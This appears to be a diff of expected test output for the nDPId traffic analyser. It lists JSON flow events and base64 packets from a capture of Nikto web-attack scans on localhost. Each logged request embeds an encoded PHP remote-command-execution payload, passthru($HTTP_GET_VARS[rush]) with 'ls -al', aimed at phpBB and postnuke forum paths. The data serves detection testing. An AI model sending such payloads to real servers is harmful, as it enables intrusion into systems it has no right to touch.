+01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7580000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420277814,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_packet_id":1,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277816,"pkt":"AAAAAAAAAAAAAAAACABFAAFmyD5AAEAGc1F\/AAABfwAAAccKH5CvpPET10Ucz4AYAED\/WgAAAQEICp1m\/2CdZv9gR0VUIC9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7580000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277816,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_packet_id":1,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277817,"pkt":"AAAAAAAAAAAAAAAACABFAAFvTQNAAEAG7oN\/AAABfwAAAccMH5C7inQwMMPyYoAYAED\/YwAAAQEICp1m\/2GdZv9hR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":697,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7580000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_packet_id":1,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277819,"pkt":"AAAAAAAAAAAAAAAACABFAAF0lOFAAEAGpqB\/AAABfwAAAccOH5D5PK3yk85ZF4AYAED\/aAAAAQEICp1m\/2KdZv9iR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":698,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_packet_id":1,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277821,"pkt":"AAAAAAAAAAAAAAAACABFAAFu9rlAAEAGRM5\/AAABfwAAAccQH5BepM+ZKyRDwoAYAED\/YgAAAQEICp1m\/2WdZv9lR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPWZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":699,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7580000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_packet_id":1,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277822,"pkt":"AAAAAAAAAAAAAAAACABFAAFs7qZAAEAGTON\/AAABfwAAAccSH5AvkdeM6hywhIAYAED\/YAAAAQEICp1m\/2adZv9mR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":700,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277822,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_packet_id":1,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277824,"pkt":"AAAAAAAAAAAAAAAACABFAAFsidNAAEAGsbZ\/AAABfwAAAccUH5D2t7Di3ewIxYAYAED\/YAAAAQEICp1m\/2idZv9oR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1mb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5OCkNCg0K"} -01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":701,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7580000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001398)"}} 